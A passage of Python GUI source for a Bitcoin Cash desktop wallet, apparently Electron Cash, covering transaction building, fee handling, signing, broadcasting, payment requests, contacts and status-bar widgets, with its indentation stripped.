outputs = [(_type, addr, amount)]
try:
opreturn_message = self.message_opreturn_e.text() if self.config.get('enable_opreturn') else None
if opreturn_message:
if self.opreturn_rawhex_cb.isChecked():
outputs.append(self.output_for_opreturn_rawhex(opreturn_message))
else:
outputs.append(self.output_for_opreturn_stringdata(opreturn_message))
tx = self.wallet.make_unsigned_transaction(self.get_coins(), outputs, self.config, fee)
self.not_enough_funds = False
self.op_return_toolong = False
except NotEnoughFunds:
self.not_enough_funds = True
if not freeze_fee:
self.fee_e.setAmount(None)
return
except OPReturnTooLarge:
self.op_return_toolong = True
return
except OPReturnError as e:
self.statusBar().showMessage(str(e))
return
except BaseException:
return
if not freeze_fee:
fee = None if self.not_enough_funds else tx.get_fee()
self.fee_e.setAmount(fee)
if self.max_button.isChecked():
amount = tx.output_value()
self.amount_e.setAmount(amount)
if fee is not None:
fee_rate = fee / tx.estimated_size()
self.fee_slider_mogrifier(self.get_custom_fee_text(fee_rate))
def fee_slider_mogrifier(self, text = None):
fee_slider_hidden = self.config.has_custom_fee_rate()
self.fee_slider.setHidden(fee_slider_hidden)
self.fee_custom_lbl.setHidden(not fee_slider_hidden)
if text is not None: self.fee_custom_lbl.setText(text)
def from_list_delete(self, name):
item = self.from_list.currentItem()
if (item and item.data(0, Qt.UserRole) == name
and not item.data(0, Qt.UserRole+1) ):
i = self.from_list.indexOfTopLevelItem(item)
try:
self.pay_from.pop(i)
except IndexError:
# The list may contain items not in the pay_from if added by a
# plugin using the spendable_coin_filter hook
pass
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
if not item:
return
menu = QMenu()
name = item.data(0, Qt.UserRole)
action = menu.addAction(_("Remove"), lambda: self.from_list_delete(name))
if item.data(0, Qt.UserRole+1):
action.setText(_("Not Removable"))
action.setDisabled(True)
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self, *, spendable=None):
''' Optional kwarg spendable indicates *which* of the UTXOs in the
self.pay_from list are actually spendable. If this arg is specifid,
coins in the self.pay_from list that aren't also in the 'spendable' list
will be grayed out in the UI, to indicate that they will not be used.
Otherwise all coins will be non-gray (default).
(Added for CashShuffle 02/23/2019) '''
sel = self.from_list.currentItem() and self.from_list.currentItem().data(0, Qt.UserRole)
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def name(x):
return "{}:{}".format(x['prevout_hash'], x['prevout_n'])
def format(x):
h = x['prevout_hash']
return '{}...{}:{:d}\t{}'.format(h[0:10], h[-10:],
x['prevout_n'], x['address'])
def grayify(twi):
b = twi.foreground(0)
b.setColor(Qt.gray)
for i in range(twi.columnCount()):
twi.setForeground(i, b)
def new(item, is_unremovable=False):
ret = QTreeWidgetItem( [format(item), self.format_amount(item['value']) ])
ret.setData(0, Qt.UserRole, name(item))
ret.setData(0, Qt.UserRole+1, is_unremovable)
return ret
for item in self.pay_from:
twi = new(item)
if spendable is not None and item not in spendable:
grayify(twi)
self.from_list.addTopLevelItem(twi)
if name(item) == sel:
self.from_list.setCurrentItem(twi)
if spendable is not None: # spendable may be None if no plugin filtered coins.
for item in spendable:
# append items added by the plugin to the spendable list
# at the bottom. These coins are marked as "not removable"
# in the UI (the plugin basically insisted these coins must
# be spent with the other coins in the list for privacy).
if item not in self.pay_from:
twi = new(item, True)
self.from_list.addTopLevelItem(twi)
if name(item) == sel:
self.from_list.setCurrentItem(twi)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
on_pw_cancel = kwargs.pop('on_pw_cancel', None)
while self.wallet.has_password():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
if callable(on_pw_cancel):
on_pw_cancel()
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def read_send_tab(self):
isInvoice= False;
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
isInvoice = True;
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
try:
# handle op_return if specified and enabled
opreturn_message = self.message_opreturn_e.text()
if opreturn_message:
if self.opreturn_rawhex_cb.isChecked():
outputs.append(self.output_for_opreturn_rawhex(opreturn_message))
else:
outputs.append(self.output_for_opreturn_stringdata(opreturn_message))
except OPReturnTooLarge as e:
self.show_error(str(e))
return
except OPReturnError as e:
self.show_error(str(e))
return
if not outputs:
self.show_error(_('No outputs'))
return
for _type, addr, amount in outputs:
if amount is None:
self.show_error(_('Invalid Amount'))
return
freeze_fee = self.fee_e.isVisible() and self.fee_e.isModified() and (self.fee_e.text() or self.fee_e.hasFocus())
fee = self.fee_e.get_amount() if freeze_fee else None
coins = self.get_coins(isInvoice)
return outputs, fee, label, coins
_cointext_popup_kill_tab_changed_connection = None
def do_cointext(self):
''' This is called by the cointext button 'clicked' signal and it
initiates the processing of the cointext URL. This should only be
called if self.payto_e.cointext is not None, otherwise it will do
nothing. '''
if self.payto_e.cointext and not self.payment_request:
if self.gui_object.warn_if_no_network(self):
return
phone = self.payto_e.cointext
sats = self.amount_e.get_amount()
if sats:
url = "https://pay.cointext.io/p/{}/{}".format(phone, sats)
def get_cointext_pr():
# Runs in thread
self.print_error("CoinText URL", url)
pr = paymentrequest.get_payment_request(url) # raises on error
return pr
def on_success(pr):
# Runs in main thread
if pr:
if pr.error:
self.print_error("CoinText ERROR", pr.error)
self.show_error(_("There was an error processing the CoinText. Please check the phone number and try again."))
return
self.print_error("CoinText RESULT", repr(pr))
self.prepare_for_payment_request()
def show_popup():
if not self.send_button.isVisible():
# likely a watching-only wallet, in which case
# showing the popup label for the send button
# leads to unspecified position for the button
return
show_it = partial(
ShowPopupLabel,
text=_("Please review payment before sending CoinText"),
target=self.send_button, timeout=15000.0,
name="CoinTextPopup",
pointer_position=PopupWidget.LeftSide,
activation_hides=True, track_target=True,
dark_mode = ColorScheme.dark_scheme
)
if not self._cointext_popup_kill_tab_changed_connection:
# this ensures that if user changes tabs, the popup dies
# ... it is only connected once per instance lifetime
self._cointext_popup_kill_tab_changed_connection = self.tabs.currentChanged.connect(lambda: KillPopupLabel("CoinTextPopup"))
QTimer.singleShot(0, show_it)
pr.request_ok_callback = show_popup
self.on_pr(pr)
def on_error(exc):
self.print_error("CoinText EXCEPTION", repr(exc))
self.on_error(exc)
WaitingDialog(self.top_level_window(),
_("Retrieving CoinText info, please wait ..."),
get_cointext_pr, on_success, on_error)
else:
self.show_error(_('CoinText: Please specify an amount'))
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee, tx_desc, coins = r
try:
tx = self.wallet.make_unsigned_transaction(coins, outputs, self.config, fee)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except ExcessiveFee:
self.show_message(_("Your fee is too high. Max is 50 sat/byte."))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
#if fee < self.wallet.relayfee() * tx.estimated_size() / 1000 and tx.requires_fee(self.wallet):
#self.show_error(_("This transaction requires a higher fee, or it will not be propagated by the network"))
#return
if preview:
self.show_transaction(tx, tx_desc)
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = 2 * self.config.max_fee_rate()
# IN THE FUTURE IF WE WANT TO APPEND SOMETHING IN THE MSG ABOUT THE FEE, CODE IS COMMENTED OUT:
#if fee > confirm_rate * tx.estimated_size() / 1000:
# msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if (fee < (tx.estimated_size())):
msg.append(_('Warning') + ': ' + _("You're using a fee of less than 1.0 sats/B. It may take a very long time to confirm."))
tx.ephemeral['warned_low_fee_already'] = True
if self.config.get('enable_opreturn') and self.message_opreturn_e.text():
msg.append(_("You are using an OP_RETURN message. This gets permanently written to the blockchain."))
if self.wallet.has_password():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx, tx_desc)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
# call hook to see if plugin needs gui interaction
run_hook('sign_tx', self, tx)
def on_signed(result):
callback(True)
def on_failed(exc_info):
self.on_error(exc_info)
callback(False)
if self.tx_external_keypairs:
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
WaitingDialog(self, _('Signing transaction...'), task,
on_signed, on_failed)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
status = False
msg = "Failed"
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
if pr:
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_payment(str(tx), refund_address)
msg = ack_msg
if ack_status:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
status = True
else:
status, msg = self.network.broadcast_transaction(tx)
return status, msg
# Check fee and warn if it's below 1.0 sats/B (and not warned already)
fee = None
try: fee = tx.get_fee()
except: pass # no fee info available for tx
# Check fee >= size otherwise warn. FIXME: If someday network relay
# rules change to be other than 1.0 sats/B minimum, this code needs
# to be changed.
if (isinstance(fee, int) and tx.is_complete() and fee < len(str(tx))//2
and not tx.ephemeral.get('warned_low_fee_already')):
msg = _('Warning') + ': ' + _("You're using a fee of less than 1.0 sats/B. It may take a very long time to confirm.") + "\n\n" + _("Proceed?")
if not self.question(msg, title = _("Low Fee")):
return
# /end fee check
# Capture current TL window; override might be removed on return
parent = self.top_level_window()
if self.gui_object.warn_if_no_network(self):
# Don't allow a useless broadcast when in offline mode. Previous to this we were getting an exception on broadcast.
return
elif not self.network.is_connected():
# Don't allow a potentially very slow broadcast when obviously not connected.
parent.show_error(_("Not connected"))
return
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
buttons, copy_index, copy_link = [ _('Ok') ], None, ''
try: txid = tx.txid() # returns None if not is_complete, but may raise potentially as well
except: txid = None
if txid is not None:
if tx_desc is not None:
self.wallet.set_label(txid, tx_desc)
copy_link = web.BE_URL(self.config, 'tx', txid)
if copy_link:
# tx is complete and there is a copy_link
buttons.insert(0, _("Copy link"))
copy_index = 0
if parent.show_message(_('Payment sent.') + '\n' + msg,
buttons = buttons,
defaultButton = buttons[-1],
escapeButton = buttons[-1]) == copy_index:
# There WAS a 'Copy link' and they clicked it
self.copy_to_clipboard(copy_link, _("Block explorer link copied to clipboard"), self.top_level_window())
self.invoice_list.update()
self.do_clear()
else:
if msg.startswith("error: "):
msg = msg.split(" ", 1)[-1] # take the last part, sans the "error: " prefix
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
result = dialog.exec_()
dialog.setParent(None)
if not result:
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.cointext = None
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
self.max_button.setDisabled(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
# New! Payment requests have an optional (may not be there!) attribute
# 'request_ok_callback' which takes 0 args and is called on request ok
# This facility was needed to do the CoinTextPopup label properly.
cb = getattr(self.payment_request, 'request_ok_callback', None)
if callable(cb):
cb()
def payment_request_error(self):
request_error = self.payment_request and self.payment_request.error
self.payment_request = None
self.print_error("PaymentRequest error:", request_error)
self.show_error(_("There was an error processing the payment request"), rich_text=False)
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = web.parse_URI(URI, self.on_pr)
except Exception as e:
self.show_error(_('Invalid bitcoincash URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
op_return = out.get('op_return')
op_return_raw = out.get('op_return_raw')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
if op_return:
self.message_opreturn_e.setText(op_return)
self.message_opreturn_e.setHidden(False)
self.opreturn_rawhex_cb.setHidden(False)
self.opreturn_rawhex_cb.setChecked(False)
self.opreturn_label.setHidden(False)
elif op_return_raw is not None:
# 'is not None' allows blank value.
# op_return_raw is secondary precedence to op_return
if not op_return_raw:
op_return_raw='empty'
self.message_opreturn_e.setText(op_return_raw)
self.message_opreturn_e.setHidden(False)
self.opreturn_rawhex_cb.setHidden(False)
self.opreturn_rawhex_cb.setChecked(True)
self.opreturn_label.setHidden(False)
elif not self.config.get('enable_opreturn'):
self.message_opreturn_e.setText('')
self.message_opreturn_e.setHidden(True)
self.opreturn_rawhex_cb.setHidden(True)
self.opreturn_label.setHidden(True)
def do_clear(self):
''' Clears the send tab, reseting its UI state to its initiatial state.'''
KillPopupLabel("CoinTextPopup") # just in case it was alive
self.max_button.setChecked(False)
self.not_enough_funds = False
self.op_return_toolong = False
self.payment_request = None
self.payto_e.cointext = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e, self.fee_e, self.message_opreturn_e]:
e.setText('')
e.setFrozen(False)
self.max_button.setDisabled(False)
self.opreturn_rawhex_cb.setChecked(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.message_opreturn_e.setVisible(self.config.get('enable_opreturn', False))
self.opreturn_rawhex_cb.setVisible(self.config.get('enable_opreturn', False))
self.opreturn_label.setVisible(self.config.get('enable_opreturn', False))
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_coin_state(self, utxos, freeze):
self.wallet.set_frozen_coin_state(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_converter_tab(self):
source_address = QLineEdit()
cash_address = ButtonsLineEdit()
cash_address.addCopyButton()
cash_address.setReadOnly(True)
legacy_address = ButtonsLineEdit()
legacy_address.addCopyButton()
legacy_address.setReadOnly(True)
widgets = [
(cash_address, Address.FMT_CASHADDR),
(legacy_address, Address.FMT_LEGACY),
]
def convert_address():
try:
addr = Address.from_string(source_address.text().strip())
except:
addr = None
for widget, fmt in widgets:
if addr:
widget.setText(addr.to_full_string(fmt))
else:
widget.setText('')
source_address.textChanged.connect(convert_address)
w = QWidget()
grid = QGridLayout()
grid.setSpacing(15)
grid.setColumnStretch(1, 2)
grid.setColumnStretch(2, 1)
label = QLabel(_('&Address to convert'))
label.setBuddy(source_address)
grid.addWidget(label, 0, 0)
grid.addWidget(source_address, 0, 1)
label = QLabel(_('&Cash address'))
label.setBuddy(cash_address)
grid.addWidget(label, 1, 0)
grid.addWidget(cash_address, 1, 1)
label = QLabel(_('&Legacy address'))
label.setBuddy(legacy_address)
grid.addWidget(label, 2, 0)
grid.addWidget(legacy_address, 2, 1)
w.setLayout(grid)
label = WWLabel(_(
"This tool helps convert between address formats for Bitcoin "
"Cash addresses.\nYou are encouraged to use the 'Cash address' "
"format."
))
vbox = QVBoxLayout()
vbox.addWidget(label)
vbox.addWidget(w)
vbox.addStretch(1)
w = QWidget()
w.setLayout(vbox)
return w
def create_list_tab(self, l, list_header=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if list_header:
hbox = QHBoxLayout()
for b in list_header:
hbox.addWidget(b)
hbox.addStretch()
vbox.addLayout(hbox)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
self.gui_object.cashaddr_toggled_signal.connect(l.update)
return self.create_list_tab(l)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
self.gui_object.cashaddr_toggled_signal.connect(l.update)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
self.gui_object.cashaddr_toggled_signal.connect(l.update)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?"
.format(addr.to_ui_string()))):
self.wallet.delete_address(addr)
self.update_tabs()
self.update_status()
self.clear_receive_tab()
def get_coins(self, isInvoice = False):
coins = []
if self.pay_from:
coins = self.pay_from.copy()
else:
coins = self.wallet.get_spendable_coins(None, self.config, isInvoice)
run_hook("spendable_coin_filter", self, coins) # may modify coins -- used by CashShuffle if in shuffle = ENABLED mode.
if self.pay_from:
# coins may have been filtered, so indicate this in the UI
self.redraw_from_list(spendable=coins)
return coins
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
run_hook('on_spend_coins', self, coins) # CashShuffle: will set the mode of send tab to coins[0]'s shuffled/unshuffled state
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.do_clear()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not Address.is_valid(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
old_entry = self.contacts.get(address, None)
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.update_completions()
# The contact has changed, update any addresses that are displayed with the old information.
run_hook('update_contact', address, self.contacts[address], old_entry)
return True
def delete_contacts(self, addresses):
contact_str = " + ".join(addresses) if len(addresses) <= 3 else _("{} contacts").format(len(addresses))
if not self.question(_("Remove {} from your list of contacts?")
.format(contact_str)):
return
removed_entries = []
for address in addresses:
if address in self.contacts.keys():
removed_entries.append((address, self.contacts[address]))
self.contacts.pop(address)
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.contact_list.update()
self.update_completions()
run_hook('delete_contacts', removed_entries)
def show_invoice(self, key):
pr = self.invoices.get(key)
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self.top_level_window(), _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1].to_ui_string(), pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
weakD = Weak.ref(d)
def do_export():
fn = self.getSaveFileName(_("Save invoice to file"), "*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.invoice_list.update()
d = weakD()
if d: d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
d.setParent(None) # So Python can GC
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console(wallet=self.wallet)
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
set_json = Weak(self.console.set_json)
c = commands.Commands(self.config, self.wallet, self.network, lambda: set_json(True))
methods = {}
password_getter = Weak(self.password_dialog)
def mkfunc(f, method):
return lambda *args, **kwargs: f(method, *args, password_getter=password_getter,
**kwargs)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_available_button = StatusBarButton(QIcon(":icons/electron-cash-update.svg"), _("Update available, click for details"), lambda: self.gui_object.show_update_checker(self, skip_check=True))
self.update_available_button.setStatusTip(_("An Electron Cash update is available"))
sb.addPermanentWidget(self.update_available_button)
self.update_available_button.setVisible(bool(self.gui_object.new_version_available)) # if hidden now gets unhidden by on_update_available when a new version comes in
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
self.cashshuffle_status_button = StatusBarButton(
self.cashshuffle_icon(),
'', # ToolTip will be set in update_cashshuffle code
self.cashshuffle_icon_leftclick
)
self.cashshuffle_toggle_action = QAction("", self.cashshuffle_status_button) # action text will get set in update_cashshuffle_icon()
self.cashshuffle_toggle_action.triggered.connect(self.toggle_cashshuffle)
self.cashshuffle_settings_action = QAction("", self.cashshuffle_status_button)
self.cashshuffle_settings_action.triggered.connect(self.show_cashshuffle_settings)
self.cashshuffle_viewpools_action = QAction(_("View pools..."), self.cashshuffle_status_button)
self.cashshuffle_viewpools_action.triggered.connect(self.show_cashshuffle_pools)
self.cashshuffle_status_button.addAction(self.cashshuffle_viewpools_action)
self.cashshuffle_status_button.addAction(self.cashshuffle_settings_action)
self.cashshuffle_separator_action = sep = QAction(self.cashshuffle_status_button); sep.setSeparator(True)
self.cashshuffle_status_button.addAction(sep)
self.cashshuffle_status_button.addAction(self.cashshuffle_toggle_action)
self.cashshuffle_status_button.setContextMenuPolicy(Qt.ActionsContextMenu)
sb.addPermanentWidget(self.cashshuffle_status_button)
self.addr_converter_button = StatusBarButton(
self.cashaddr_icon(),
_("Toggle CashAddr Display"),
self.toggle_cashaddr_status_bar
)
self.update_cashaddr_icon()
sb.addPermanentWidget(self.addr_converter_button)
self.addr_converter_button.setHidden(self.gui_object.is_cashaddr_status_button_hidden())
self.gui_object.cashaddr_status_button_hidden_signal.connect(self.addr_converter_button.setHidden)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.svg"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
weakSelf = Weak.ref(self)
gui_object = self.gui_object
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.svg"), _("Network"), lambda: gui_object.show_network_dialog(weakSelf()))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def on_update_available(self, b):
self.update_available_button.setVisible(bool(b))
# The popup label won't really be shown unless this window is
# on top.. but regardless we give each label a unique internal name
# so they dont interfere with each other.
lblName = "UpdateAvailable_" + self.diagnostic_name()
if b:
ShowPopupLabel(name = lblName,
text="<center><b>{}</b><br><small>{}</small></center>".format(_("Update Available"),_("Click for details")),
target=self.update_available_button,
timeout=20000, onClick=self.update_available_button.click,
onRightClick=self.update_available_button.click,
dark_mode = ColorScheme.dark_scheme)
else:
# Immediately kills any extant labels
KillPopupLabel(lblName)
def update_lock_icon(self):
icon = QIcon(":icons/lock.svg") if self.wallet.has_password() else QIcon(":icons/unlock.svg")
tip = _('Wallet Password') + ' - '
tip += _('Enabled') if self.wallet.has_password() else _('Disabled')
self.password_button.setIcon(icon)
self.password_button.setStatusTip(tip)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.can_change_password())
self.send_button.setVisible(not self.wallet.is_watching_only() and not self.payto_e.cointext)
self.preview_button.setVisible(not self.payto_e.cointext)
self.cointext_button.setVisible(bool(self.payto_e.cointext))
def change_password_dialog(self):
from .password_dialog import ChangePasswordDialog
d = ChangePasswordDialog(self.top_level_window(), self.wallet)
ok, password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(password, new_password, encrypt_file)
run_hook("on_new_password", self, password, new_password)
except BaseException as e:
self.show_error(str(e))
return
except:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if new_password else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self.top_level_window(), _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self.top_level_window(), _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
